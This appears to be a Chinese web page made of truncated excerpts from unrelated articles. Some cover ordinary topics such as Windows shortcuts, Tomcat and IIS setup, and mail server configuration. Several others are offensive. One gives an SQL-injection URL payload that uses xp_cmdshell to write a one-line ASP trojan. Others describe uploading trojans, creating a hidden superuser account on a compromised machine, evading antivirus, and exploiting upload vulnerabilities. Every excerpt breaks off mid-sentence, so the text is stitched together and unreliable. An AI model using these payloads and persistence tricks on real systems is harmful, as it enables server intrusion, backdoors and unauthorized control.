Windows快捷键大全一、常见用法：F1　　　　　　　　　　　显示当前程序或者windows的帮助内容。F2　　　　　　　　　　　当你选中一个文件的话，这意味着“重命名”F3　　　　　　　　　　　当你在桌面上的时候是打开“查找：所有文件” 对话框 F10或ALT　　　　　　　　激活当前程序的菜单栏windows键或CTRL+ESC　　 打开开始菜单 CTRL+ALT+DELETE　　　　 在wi

最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单，只需使用下面的SQL语句：EXEC master.dbo.xp_cmdshell dir c:/但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险，他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名，这时侯许多人也许会放弃，因为我们无

整理的一些有用的ASP注入相关的命令 BY pt007&solaris7大家好 ,我们是pt007和solaris7，QQ：7491805/564935，欢迎高手前来交流：）。1、 用^转义字符来写ASP(一句话木马)文件的方法: http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execut

 关键词： ASP注入                                           文章作者：pt007 & solaris71、   用^转义字符来写ASP(一句话木马)文件的方法:   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execute

1． 自动启动(启动选项)：msconfig 2． 组策略：gpedit.msc. 3． 本机用户和组：lusrmgr.msc. 4． 性能：perfmon.msc. 5． 本地安全设置：secpol.msc. 6． 服务:services.msc. 7． 注册表编辑器：regedit. 8． 编辑右键“发送到”命令：sendto. 9． 计算机管理：compmgmt.msc. 10． 设

你要说是修改木马、病毒其中代码或加密也或者说加壳等来逃避杀软，错了，谁也不保证你修改过的木马、病毒不被杀。杀毒商不是吃干饭的！！！！！！ok，我们运行CMD。先说一下原理：---大家都知道在Windows中"/"符号是路径的分隔符号，比如"C:/Windows/"的意思就是C分区中的Windows文件夹，"C:/Windows/System.exe"的意思就是C分区中的Windows文

SQL注入后，如何上传木马，一直是比较头疼的事，我这里提供上传木马的一种另一种方法。1、SQL注入的时候，用xp_cmdshell 向服务器上写入一个能写文件的asp文件。文件内容：Set objFSO = Server.CreateObject("scripting.FileSystemObject")Set objCountFile=objFSO.CreateTextFile(request(

Windows2003已经出现很久了,现在对于该服务器操作系统Windows2003的组网技术、安全配置技术还有很多的网友都还不是很熟悉，在这里，我将会给大家介绍一下Windows Server 2003 Enterprise Edition 企业服务器版本的组网技术、安全配置技术及一些在Win2K系统升级为Win2003系统后的一些新增功能等。Win2003系统已经比Win2K系统增加了很多的安

修改默认远程桌面登陆端口3389不修改会很危险第一步regedit.exe第二步查找3389：HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server / WinStations / RDP-Tcp第三步修改3389：我们找到rdp-tcp后就会在注册表的右边查找PortNumber（在PortNumbe

通过使用正则表达式，可以在 Microsoft FrontPage 中执行繁复的查找和替换操作。正则表达式是在搜索文本或代码的过程中，说明要查找的一个或多个字符串范式，它由普通字符和特殊字符组成。如果您不知道所要查找的确切文本或代码，或者如果您正在查找文本或代码字符串的多种类似情况时，可以使用正则表达式。若要使用正则表达式，请打开 FrontPage 中的“查找和替换”对话框，选择“正则表达式”复

Windows启动时通常会有一大堆程序自动启动。不要以为管好了“开始→程序→启动”菜单就万事大吉，实际上，在Windows XP/2K中，让Windows自动启动程序的办法很多，下文告诉你最重要的两个文件夹和八个注册键。　　一、当前用户专有的启动文件夹　　这是许多应用软件自动启动的常用位置，Windows自动启动放入该文件夹的所有快捷方式。用户启动文件夹一般在：＼Documents and Set

建立隐藏的超级用户假设我们是以超级用户ADMINISTRATOR的身份登陆到肉鸡上的，首先在命令行下或账户管理中建立一个用户hacker，开始-运行中打开regedt32.exe，WINDOWS XP/2000的账户信息都在注册表下的HKEY_LOCAL_MACHINE/SAM/SAM键下，除了系统用户SYSTEM以外，其他用户都无权查看这一项，右键有权限一项，因为我们是一ADMINISTRATO

hijackthis是一款很方便的分析工具，大部分浏览器被劫持时都可以通过hijackthis进行分析修复瑞星网站上也提供了比较详细的教程——瑞星HijackThis专题http://it.rising.com.cn/newSite/Channels/anti_virus/Antivirus_Faq/TopicExplorerPagePackage/hijackthis.htm但是有很多朋友提出在

Windows 2003邮件服务器配置指南（图）       邮件服务器的配置同样是企业网络管理中经常要进行的任务之一。与Web网站、FTP站点服务器一样，邮件服务器的配置方案也非常之多，但对于中小型企业说，利用网络操作系统自带的方式进行配置是最经济的。本文中，要向大家介绍如何在Windows Server 2003系统中配置企业内部邮件服务器。　　一、基本思路　　在Windows S

Flash OBJECT和EMBED标签   我们现在大部分人做网页，都是直接用DW插入flash，而且DW也是所见即所得，直接生成了相应的flash显示代码。可是我们又有多少人了解这些直接由DW生成的代码呢？其实我接触flash player标签，是在刚学习html的时候，那时书中插入flash只有最简单的一句,而且在很长一段时间里，只要网页中插入flash我也都是这样写的，当时认为，这样写即简

很多企业局域网内都架设了邮件服务器，用于进行公文发送和工作交流。但使用专业的企业邮件系统软件需要大量的资金投入，这对于很多企业来说是无法承受的。其实我们可以通过Windows Server 2003提供的POP3服务和SMTP服务架设小型邮件服务器来满足我们的需要。 　　一、安装POP3和SMTP服务组件 　　Windows Server 2003默认情况下是没有安装POP3和SMTP服务组件的，

　　花了很久时间，终于搞定了IIS6和Tomcat的整合。现在把步骤贴出来给各位一点参考，也免去了新手在Google上暴走和一次次的调试。开始吧！　　首先先说明我的系统，Windows 2003 Server中文版+IIS6+Tomcat5.0.14，JDK 1.4.2安装目录为C://JDK,Tomcat安装目录为C://Tomcat,

摘 要 要学习JSP开发，必须先搭建一个符合JSP规范的开发环境。本文以实用为原则，介绍了以Tomcat服务器为核心的3种配置JSP环境的方法。 　　关键字 JSP引擎，Web服务器，配置　　Sun推出的JSP（Java Server Pages）是一种执行于服务器端的动态网页开发技术，它基于Java技术。执行JSP时需要在Web服务器上架设一个编译JSP网页的引擎。配置 JSP 环境可以有多

Alerter 微软： 通知选取的使用者及计算机系统管理警示。如果停止这个服务，使用系统管理警示的程序将不会收到通知。如果停用这个服务，所有依存于它的服务将无法启动。 补充： 一般家用计算机根本不需要传送或接收计算机系统管理来的警示(Administrative Alerts)，除非你的计算机使用在局域网络上并使用该项功能。 依存： Workstation 建议： 已停用 Application

Windows 2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等，可能会根据服务器所开启的服务不同。当我们用流光探测时，比如说IPC探测，就会在安全日志里迅速地记下流光探测时所用的用户名、时间等等，用FTP探测后，也会立刻在FTP日志中记下IP、时间、探测所用的用户名和密码等等。甚至连流影启动时需要msvcp60.dll这个动库链接库，如果服务

   自从动网7拉开上传漏洞序幕后，各种系统的上传漏洞接踵而来！它们的漏洞原理基本都差不多，利用方法上有略微的差异，简言之可以归纳为几步：先抓包，然后修改文件类型，再在上传路径后加上空格，用十六进制编辑器把空格改成00，最后用NC提交。当然最好还是找一个具体的UpFile文件来自己分析一下，这样有助于提高对漏洞的理解和记忆！本文没有太高深的技术，只不过是把目前发现有上传漏洞的系统按编程语言分类汇总

介绍通用Hook的一点思想:    在系统内核级中,MS的很多信息都没公开,包括函数的参数数目,每个参数的类型等。在系统内核中,访问了大量的寄存器,而很多寄存器的值,是上层调用者提供的。如果值改变系统就会变得不稳定。很可能出现不可想象的后果。另外有时候对需要Hook的函数的参数不了解,所以不能随便就去改变它的堆栈,如果不小心也有可能导致蓝屏。所以Hook的最佳原则是在自己的Hook函数中呼叫原函数

方法一: 程序代码常用函数 1、输入url目标网页地址，返回值getHTTPPage是目标网页的html代码 function getHTTPPage(url) dim Http set Http=server.createobject("MSXML2.XMLHTTP") Http.open "GET",url,false Http.send() if Http.readystat